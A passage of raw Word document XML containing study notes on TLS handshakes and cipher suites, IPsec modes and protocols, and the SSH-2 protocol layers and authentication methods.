      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> However it can also be used for UDP applications. </w:t>
      </w:r>
      <w:r w:rsidRPr="00080968">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>TLS can also be used to tunnel an entire network stack to create a VPN, as is the case with OpenVPN.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0099492D" w:rsidRDefault="00817C7B" w:rsidP="0099492D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="66"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00817C7B">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">A prominent use of </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SSL/</w:t>
      </w:r>
      <w:r w:rsidRPr="00817C7B">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>TLS is for securing World Wide Web traffic carried by HTTP to form HTTPS. Notable applications are electronic commerce and asset management. Increasingly, the Simple Mail Transfer Protocol (</w:t>
      </w:r>
      <w:r w:rsidR="0099492D">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SMTP) is also protected by TLS</w:t>
      </w:r>
      <w:r w:rsidRPr="00817C7B">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>. These applications use public key certificates to verify the identity of endpoints</w:t>
      </w:r>
      <w:r w:rsidR="0099492D">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0099492D" w:rsidRPr="0099492D" w:rsidRDefault="0099492D" w:rsidP="0099492D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="66"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0099492D">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>A TLS client and server negotiate a stateful connection by using a handshaking procedure. During this handshake, the client and server agree on various parameters used to establish the connection's security.</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The handshake begins when a client connects to a TLS-enabled server requesting a secure connection, and presents a list of supported CipherSuites (ciphers and hash functions).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From this list, the server picks the strongest cipher and hash function that it also supports and notifies the client of the decision.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The server sends back its identification in the form of a digital certificate. The certificate usually contains the server name, the trusted certificate authority (CA), and the server's public encryption key.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lastRenderedPageBreak/>
        <w:t xml:space="preserve">The client may contact the server that issued the certificate (the trusted CA as above) and confirm that the certificate is authentic before proceeding.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In order to generate the session keys used for the secure connection, the client encrypts a random number (RN) with the server's public key (PbK), and sends the result to the server. Only the server should be able to decrypt it (with its private key (PvK)): this is the one fact that makes the keys hidden from third parties, since only the server and the client have access to this data. The client knows PbK and RN, and the server knows PvK and (after decryption of the client's message) RN. A third party may only know RN if PvK has been compromised. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008F21F6" w:rsidRDefault="0099492D" w:rsidP="008F21F6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="66"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F8FCFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0099492D">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>From the random number, both parties generate key material for encryption and decryption. This concludes the handshake and begins the secured connection, which is encrypted and decrypted with the key material until the connection closes.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0099492D" w:rsidRDefault="008F21F6" w:rsidP="008F21F6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="66"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F8FCFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CipherS</w:t>
      </w:r>
      <w:r w:rsidRPr="008F21F6">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>uite - combination of authentication, encryption, and message authentication code (MAC) algorithms used to negotiate the security settings for a network connection using the Transport Layer Security (TLS) or Secure Sockets Layer (SSL) network protocol.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Each named cipher defines:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008F21F6" w:rsidRPr="008F21F6" w:rsidRDefault="008F21F6" w:rsidP="008F21F6">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key exchange algorithm</w:t>
      </w:r>
      <w:r w:rsidRPr="008F21F6">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> is used to determine if and how the client and server will authenticate during the handshake. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008F21F6" w:rsidRPr="008F21F6" w:rsidRDefault="008F21F6" w:rsidP="008F21F6">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bulk encryption algorithm</w:t>
      </w:r>
      <w:r w:rsidRPr="008F21F6">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> is used to encrypt the message stream. It also includes the key size and the lengths of explicit and implicit initialization vectors (cryptographic nonces). The </w:t>
      </w:r>
      <w:r w:rsidRPr="008F21F6">
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>message authentication code</w:t>
      </w:r>
      <w:r w:rsidRPr="008F21F6">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> (MAC) algorithm is used to create the message digest, a cryptographic hash of each block of the message stream. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00080968" w:rsidRDefault="008F21F6" w:rsidP="0099492D">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pseudorandom function</w:t>
      </w:r>
      <w:r w:rsidRPr="008F21F6">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> (PRF) is used to create the </w:t>
      </w:r>
      <w:r w:rsidRPr="008F21F6">
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>master secret</w:t>
      </w:r>
      <w:r w:rsidRPr="008F21F6">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>, a 48-byte secret shared between the two peers in the connection. The master secret is used as a source of entropy when creating session keys, such as the one used to create the MAC.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008F21F6" w:rsidRPr="008F21F6" w:rsidRDefault="008F21F6" w:rsidP="008F21F6">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F8FCFF"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="007B1FEB" w:rsidRDefault="009B06BB" w:rsidP="008876A5">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Key exchange algorithm i.e. RSA/DSA</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009B06BB" w:rsidRDefault="009B06BB" w:rsidP="008876A5">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Authentication i.e. RSA/DSA</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009B06BB" w:rsidRDefault="009B06BB" w:rsidP="008876A5">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Encryption i.e DES OR AES</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009B06BB" w:rsidRDefault="009B06BB" w:rsidP="008876A5">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>MAC – SHA1 or MD5</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007B1FEB" w:rsidRPr="00CC2DFA" w:rsidRDefault="00576AAB" w:rsidP="008876A5">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC2DFA">
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>IPSec:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00576AAB" w:rsidRPr="00CC2DFA" w:rsidRDefault="00576AAB" w:rsidP="00CC2DFA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="67"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC2DFA">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Internet Protocol Security (IPsec) is a protocol suite for securing Internet Protocol (IP) communications by authenticating and encrypting each IP packet of a data stream. IPsec also includes protocols for establishing mutual authentication between agents at the beginning of the session and negotiation of cryptographic keys to be used during the session. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00576AAB" w:rsidRDefault="00576AAB" w:rsidP="00CC2DFA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="67"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC2DFA">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">IPsec is a dual mode, end-to-end, security scheme operating at the Internet Layer of the Internet Protocol Suite or OSI model Layer 3. Hence, IPsec can be used for protecting any application traffic across the Internet. Applications need not be specifically designed to use IPsec. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009912BD" w:rsidRPr="009912BD" w:rsidRDefault="009912BD" w:rsidP="009912BD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="67"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009912BD">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">The IPsec suite is a framework of open standards. IPsec uses the following protocols to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>perform various functions:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009912BD" w:rsidRPr="009912BD" w:rsidRDefault="009912BD" w:rsidP="009912BD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="67"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009912BD">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>A security association (SA) set up by Internet Key Exchange (IKE and IKEv2) or Kerberized Internet Negotiation of Keys (KINK) by handling negotiation of protocols and algorithms and to generate the encryption and authentication ke</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ys to be used by IPsec.</w:t>
      </w:r>
      <w:r w:rsidRPr="009912BD">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009912BD" w:rsidRPr="009912BD" w:rsidRDefault="009912BD" w:rsidP="009912BD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="67"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009912BD">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Authentication Header (AH) to provide connectionless integrity and data origin authentication for IP datagrams and to provide protectio</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>n against replay attacks.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009912BD" w:rsidRDefault="009912BD" w:rsidP="009912BD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="67"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009912BD">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Encapsulating Security Payload (ESP) to provide confidentiality, data origin authentication, connectionless integrity, an anti-replay service (a form of partial sequence integrity), and limited </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>traffic flow confidentiality.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009912BD" w:rsidRDefault="008457CC" w:rsidP="00B536F7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="67"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008457CC">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>IPsec can be implemented in a host-to-host transport mode, as w</w:t>
      </w:r>
      <w:r w:rsidR="00B536F7">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ell as in a network tunnel mode:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B536F7" w:rsidRPr="00B536F7" w:rsidRDefault="00B536F7" w:rsidP="00B536F7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="67"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B536F7">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Transport mode</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:r w:rsidRPr="00B536F7">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>In transport mode, only the payload (the data you transfer) of the IP packet is encrypted and/or authenticated. The routing is intact, since the IP header is neither modified nor encrypted; however, when the authentication header is used, the IP addresses cannot be translated, as this will invalidate the hash value. Transport mode is used for host-to-host communications.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B536F7" w:rsidRDefault="00B536F7" w:rsidP="00B536F7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="67"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B536F7">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Tunnel mode - In tunnel mode, the entire IP packet (data and IP header) is encrypted and/or authenticated. It is then encapsulated into a new IP packet with a new IP header. Tunnel mode is used to create Virtual Private Networks for network-to-network communications (e.g. between </w:t>
      </w:r>
      <w:r w:rsidRPr="00B536F7">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>routers to link sites), host-to-network communications (e.g. remote user access), and host-to-host communications (e.g. private chat).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B536F7" w:rsidRPr="00B536F7" w:rsidRDefault="00B536F7" w:rsidP="00B536F7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="67"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B536F7">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Cryptographic algorithms defined for use with IPsec include: HMAC-SHA1 for integrity protection and authenticity; TripleDES-CBC and AES-CBC for confidentiality.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00576AAB" w:rsidRDefault="00576AAB" w:rsidP="008876A5">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00576AAB" w:rsidRPr="00CC2DFA" w:rsidRDefault="00576AAB" w:rsidP="008876A5">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC2DFA">
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SSH:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00576AAB" w:rsidRDefault="00576AAB" w:rsidP="00CC2DFA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="68"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC2DFA">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Secure Shell or SSH is a network protocol that allows data to be exchanged using a secure channel between two networked devices. Used primarily on GNU/Linux and Unix based systems to access shell accounts, SSH was designed as a replacement for Telnet and other insecure remote shells, which send information, notably passwords, in plaintext, rendering them susceptible to packet analysis.</w:t>
      </w:r>
      <w:r w:rsidR="00CC2DFA" w:rsidRPr="00CC2DFA">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CC2DFA">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>The encryption used by SSH provides confidentiality and integrity of data over an insecure network, such as the Internet.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B536F7" w:rsidRDefault="00B536F7" w:rsidP="00CC2DFA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="68"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B536F7">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SSH uses public-key cryptography to authenticate the remote computer and allow the remote computer to authenticate the user, if necessary</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B536F7" w:rsidRDefault="00B536F7" w:rsidP="00CC2DFA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="68"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B536F7">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SSH is typically used to log into a remote machine and execute commands, but it also supports tunneling, forwarding TCP ports and X11 connections; it can transfer files using the asso</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ciated SFTP or SCP protocols.</w:t>
      </w:r>
      <w:r w:rsidRPr="00B536F7">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> SSH uses the client-server model</w:t>
      </w:r>
      <w:r w:rsidR="00BF49BC">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> where the </w:t>
      </w:r>
      <w:r w:rsidR="00BF49BC" w:rsidRPr="00BF49BC">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SSH client typically </w:t>
      </w:r>
      <w:r w:rsidR="00BF49BC">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>establishes</w:t>
      </w:r>
      <w:r w:rsidR="00BF49BC" w:rsidRPr="00BF49BC">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> connections to an SSH daemon accepting remote connections.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BF49BC" w:rsidRPr="00BF49BC" w:rsidRDefault="00BF49BC" w:rsidP="00BF49BC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="68"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BF49BC">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>The SSH-2 protocol has an internal architecture with well-separated layers which are:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BF49BC" w:rsidRPr="00BF49BC" w:rsidRDefault="00BF49BC" w:rsidP="00BF49BC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="68"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BF49BC">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Transport layer - handles initial key exchange and server authentication and sets up encryption, compression and integrity verification. It exposes to the upper layer an interface for sending and receiving plaintext packets and also arranges for key re-exchange, usually after 1 GB of data or a 1 hour period. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BF49BC" w:rsidRPr="00BF49BC" w:rsidRDefault="00BF49BC" w:rsidP="00BF49BC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="68"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BF49BC">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">User authentication layer - handles client authentication, which is client driven, and provides a number of authentication methods: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BF49BC" w:rsidRPr="00BF49BC" w:rsidRDefault="00BF49BC" w:rsidP="00BF49BC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="68"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BF49BC">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Password - a method for straightforward password authentication, including a facility allowing a password to be changed. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BF49BC" w:rsidRPr="00BF49BC" w:rsidRDefault="00BF49BC" w:rsidP="00BF49BC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="68"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BF49BC">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Publickey - a method for public key-based authentication, usually supporting at least DSA or RSA keypairs. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BF49BC" w:rsidRPr="00BF49BC" w:rsidRDefault="00BF49BC" w:rsidP="00BF49BC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="68"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BF49BC">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Keyboard-interactive - a versatile method where the server sends one or more prompts to enter information and the client displays them and sends back responses keyed-in by the user. Used to provide one-time password authentication such as S/Key or SecurID. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BF49BC" w:rsidRPr="00BF49BC" w:rsidRDefault="00BF49BC" w:rsidP="00BF49BC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="68"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BF49BC">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>GSSAPI authentication - providing an extensible scheme to perform SSH authentication using external mechanisms such as Kerberos 5 or NTLM, providing single sign on capability to SSH sessions.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BF49BC" w:rsidRPr="00BF49BC" w:rsidRDefault="00BF49BC" w:rsidP="00BF49BC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="68"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BF49BC">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
